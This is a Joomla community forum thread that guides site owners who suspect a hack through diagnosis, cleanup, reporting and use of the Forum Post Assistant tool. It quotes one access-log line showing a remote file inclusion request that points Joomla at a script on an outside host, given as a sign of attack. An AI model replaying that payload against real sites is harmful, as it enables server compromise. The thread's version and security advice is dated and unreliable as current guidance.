You think you're site got hacked? Read this first, please!!!

[Hackwar]

Please go directly to the next two posts
http://forum.joomla.org/viewtopic.php?p ... 6#p2661596
and
http://forum.joomla.org/viewtopic.php?p ... 8#p2661598

This first post may contain outdated links and removed content references.




Hi,
you think you have been hacked? We will try to give you some help on how to proceed further.

Please note that this thread is locked, it can be discussed here.

At first we have to gather some information:

• What version of Joomla do you have?
• What version of PHP/MySQL/Apache do you have?
• What kind of hosting do you have?
• Do you have access to the access logs of the server?
• Which third party extensions do you have installed? (Components, modules, plugins/mambots)
• Which informations do you have from your provider? Did they send you something in addition?
• Do you have a backup?
• Have you checked the folder permissions?
• Have you really been hacked?

What version of Joomla do you have?
There are currently no known vulnerabilities in Joomla 1.0.11! If you have a version prior to this, please update as soon as possible. Prior versions of Joomla have some serious vulnerabilities, which sometimes can lead to a complete loss of your server!

What version of PHP/MySQL/Apache do you have?
PHP 4.3 had some reported bugs and vulnerabilities and you should consider upgrading to a newer version. (4.4.x will be fine) In general you should not use versions of PHP and MySQL that are older than the 4.x versions. If you plan to upgrade to Joomla 1.5 later, you should consider updating to at least PHP 4.4.x and MySQL 4.1.13, since these versions are the minimum requirement for native UTF-8 support. (Joomla 1.5 will work with older versions though)
In general, you should use the latest versions of the used software to prevent any vulnerabilities from this side.

What kind of hosting do you have?
There are several kinds of hosting and only a few provide a single server for you alone. If you don't have a server for your site(s) alone, you have a shared hosting environment. Sometimes your account can get hacked by accounts for other sites on that server. This is a configuration error by your provider and can be prevented, but not all providers are so thorough. If you find out, that your account has been hacked via another users account, contact your provider and demand him to correct his configuration to prevent this in the future. If he does not respond positive, you should think about changing your provider.

Do you have access to the access logs of the server?
If Joomla was the target for the attack, we need to know how. Most servers have access logs that can give more information in that regard and save the used URL.
There was a problem with code/SQL injection in Joomla 1.0.3. URLs like these pointed to an hack attempt:

xxx.xxx.xxx.xxx - - [01/Apr/2006:12:00:00 0000] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://medenin.me.funpic.de/cmd.txt?&cm ... google.txt? HTTP/1.0" 200 167 "-" "Mozilla/5.0"

If you see URLs like that or your provider suspends your account because of URLs of this kind, make sure you have the latest Joomla installed. The current version is not vulnerable to these kinds of attack. All core code uses a function that filters all input variables for SQL or code injections. However, this is not allways the case for third party extensions! Some of them are potentially vulnerable to code injection because of poor coding practice.

Which third party extensions do you have installed? (Components, modules, plugins/mambots)
The Joomla core itself is very secure, but some extensions, especially those coded fast and nasty, are vulnerable to certain attacks. Bigger and established extensions like Community Builder or Joom!fish are thoroughly tested and use the proposed coding techniques. If you are not a coder and can look for this yourself, look for reviews by other people in the forum. If you want to check this yourself, look here. (This article has been written for Joomla 1.5, but the code is somewhat similar to the Joomla 1.0.x series)
In the last months, a lot of unsecure extensions have been discovered. A list of those can be found here

Which informations do you have from your provider? Did they send you something in addition?
If you have been informed by your provider that you have been hacked, they should give you a reason how they have noticed that and what they can tell you besides that. Information from their side is often the most important part.

Do you have a backup?
If you have a backup, save the current files of your webserver and make a dump from your database to save evidence. This way the core can investigate this further without any additional downtime from your page.
If you don't have a backup, save all images of your page and make a dump from your database. After that, erase EVERYTHING! You can't be sure if there is no file of the hacker left in some very deep folder of your installation, that could help him gaining control again. Yes, you may have needed a lot of time to customize your page, but the risk is to high.

Have you checked the folder permissions?
A webserver has a sophisticated system to control the read, write and execute permissions of its files. If you give to much access to your folders, your server gets vulnerable and can be hacked easily. Thats why you shouldn't give more than the standard 755 for folders and 644 for files. This is a number combination that represents a certain kind of read/write access. Basically you give full access to the owner of the file and only restricted access to others. The ownership is another problem and both are well discussed in the forum.

Have you really been hacked?
This is a question you should really consider. Have I been hacked? Have I removed every other option? Some provider do changes on their system without informing you, or your server had a hardware failure, which is the reason why he is not responding like normal. Also, do you probably have misconfigured your page? Have you changed the database password and forgot to change it in Joomla? Please take all this into consideration!

I have checked all this, what can I do now?
Ok, you have collected all the files, you are sure that its Joomla and not your or your providers configuration that has caused the hacker to gain access to your server and you also have eliminated all third party extensions as source of the vulnerability. Now wrap all that information up in a nice mail and send it to security [at] joomla [dot] org. With this mailinglist you reach the developers and they will investigate this further.

Please be sure that your request is valid. If you send a non valid request to the core team, they will have to waste time on this and if to many people do this, the core has to stop this service.
They are trying to help you and the other users, but if they are swamped with requests or non-security related topics, they don't have enough time for all requests or they wont be able to review them as thoroughly.

Ok, I have informed the core and I have restored my server. What should I do next?
First of all: Change all passwords. No matter what kind of password it was, change them all. Also, change all passwords from your Joomla users that are higher than "Registered". It will not help if you changed all your passwords but the super-admin account of your colleague has still the same old password that the hacker could crack. (The passwords are hashed with the MD5 algorithm and should not be able to be decoded. however, the algorithm has been cracked and if you know the hash code, you can calculate a password with the same hash. In Joomla 1.5 you can choose between different coding formats.)

One last thing: When you reinstall Joomla, you don't have to have all folders to be writeable. In general, you only need the images and media folder to be set to that. All other folders are only needed to be writeable when you want to install an extension. Keeping them unwriteable will greatly improve your security!

After that, you can continously check your files. For this you can use the tool mentioned here. Further check the folder permissions and file ownership. You should search for this one on the forum. There are numerous posts about this and about as many solutions.

Whatever your problem is, we feel with you and hope it turns out well for you!

[mandville]

It would help us to help you if before you post your security/been hacked topic

Tell us if you have done the following, try copy and paste to use as a posting guide if needed

[ ] Did you use the forum http://forum.joomla.org/search.php search box for a similar error?

[ ] Run the Forum Post Assistant / FPA Instructions available here and are also included in the download package.

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation. Replace the deleted files with fresh copies of a current full version of Joomla, and fresh copies of extensions and templates used. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist checklist 7 to make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777, but ideal is 644 and 755

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled

Note: The forum post tool will work with J1.0.x, J1.6.x, J1.7.x

[mandville]

General Information on the FPA Script:

The Forum Post Assistant has been designed to assist forum posters to be able to post relevant system, instance, php and troubleshooting information directly in to a pre-formatted forum post. This should save a few hours of posting back and forth, asking for, and explaining how to acquire useful information in order for other forum users to help troubleshoot a problem.
This process also means that consistent information is gathered and presented in every case, enabling helpers to quickly target information relevant to the specific problem observed by the user.

USE AT YOUR OWN RISK Accuracy and completeness of this script and documentation is not assured and no responsibility will be accepted for any damage, issues or confusion caused by using any FPA versions contained within these branches.

Discussion topic on the FPA tool is at: http://forum.joomla.org/viewtopic.php?f=621&t=656394 Report any issues there.

Download:
Use these links to download the FPA:
Download .tar.gz version or Download the .zip version

Compatibility:
PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

Joomla! Version Support:
- v 1.0.x - v 1.5.x - v 1.6.x - v 1.7.x

Known Issues:
FPA is not currently fully compatible with Joomla websites that have had their configuration.php file moved outside of the public_html directory.

Installation:
1. Download the desired archive
2. Uncompress the downloaded package file on your own computer (using WinZip or another decompression tool).
3. READ the included README file for any special Release notes.
4. READ the included Documentation file for detailed usage instructions.
5. Upload the fpa-en.php script to your Joomla! Site Root "/" directory. This is the place you installed Joomla and may not be the main root for your server. See examples below.
6. Run the script through your browser by entering: http:// mysite.com/fpa-en.php. See examples below.

Installation Examples:
Joomla! is installed in your web-root folder:
Upload the fpa-en.php script to: <your-domain-name.com>/public_html/
To run the script: http:// mysite.com/public_html/fpa-en.php

Joomla! is installed in a sub-directory named "cms":
Upload the fpa-en.php script to: <your-domain-name.com>/public_html/cms/
To run the script: http:// mysite.com/public_html/cms/fpa-en.php

Usage:
When called from your browser, the Forum Post Assistant will run and display information it has gathered about your site and the server environment your site is installed on. You may use the information displayed by the FPA to assist in troubleshooting your site.

fpa1.jpg

Using the FPA to make a post to a Security forum topic:

Click on the “Show the Forum Post Assistant” link to open the Post Tool for generating the code you will paste into your forum post.

fpa6.jpg

Enter a brief description of your problem, any error messages you see, and a brief description of any actions you have taken to resolve the issue (optional). You may leave this information blank if desired, but providing what you can will usually help figure out the issue. Security options are best left at their default for posting in the forum.

fpa2.jpg

Select run time options detail level for the report and select the Information Privacy Level of the report (optional). You may leave this information at the defaults if desired, but providing additional information about installed extensions can usually help figure out the issue.

fpa3.jpg

Generating the Post:
Click the “Click Here To Generate Post” button to build the post content using the information and options you selected above.
Click the “Reset” button to reset to defaults the information and options selections displayed in Figures 1 and 2.
If you get an “Out of Memory” or “Execution Time Error” when generating the post information, then select the Seeing PHP "Out of Memory" or "Execution Time" Errors? check box to temporarily increase PHP memory and execution times and try generating the post again.

fpa4.jpg

Copying the Generated Information:
Place your computer cursor into the Post Detail box. It does not matter where within the code the cursor is.
Select All of the content by using the key combination CTRL – A to select all of the code within the box.
Copy the contents selected to your computers clipboard by using the key combination CTRL – C

fpa5.jpg

Inserting the information into a New Forum Posting:

If you have not made a posting in the appropriate Joomla security forum for your version of Joomla about your security issue, then select take the steps below:
* Click on the “New Topic” button.
* Enter a descriptive subject for your topic. Avoid the phrase I was hacked!
* In the message body, enter any additional information you think may be helpful in assisting with the issue your having. Do Not post any direct links to infected sites, assumed nationality, hacker links or hacker names you found displaying on your site.
* Paste the information from the FPA into the message body area using the CTRL – V keyboard command. The correct forum format codes are already included in the post generation so there is no additional formatting needed of the generated code.
* If you need to add pictures for clarity, use the attachment upload section of the forum post editor to add them now.
* If you wish to preview the message before posting it, then click the “Preview” button below the message body area.
* When satisfied with your message, click the “Submit” button that is below the message body area.

Inserting the information into an Existing Forum Thread:

* At the bottom of an existing forum thread there is a “Quick Reply” message body area. You may use that to post the FPA information into your existing forum thread.
* In the message body area, enter any additional information you think may be helpful in assisting with the issue your having. Do Not post any direct links to infected sites, assumed nationality, hacker links or hacker names you found displaying on your site.
* Paste the information from the FPA into the message body area using the CTRL – V keyboard command. The correct forum format codes are already included in the post generation so there is no additional formatting needed of the generated code.
* When satisfied with your message, click the “Submit” button that is below the message body area.
* If you wish to preview the message before posting it or prefer working in the full forum message editor, then click the “Full Editor” button below the message body area. Use the “Full Editor” if you need to add pictures for clarity!

fpa7.jpg

Discussion topic on the FPA tool is at: http://forum.joomla.org/viewtopic.php?f=621&t=656394 Post any questions on the use of the FPA, bugs, and suggestions there.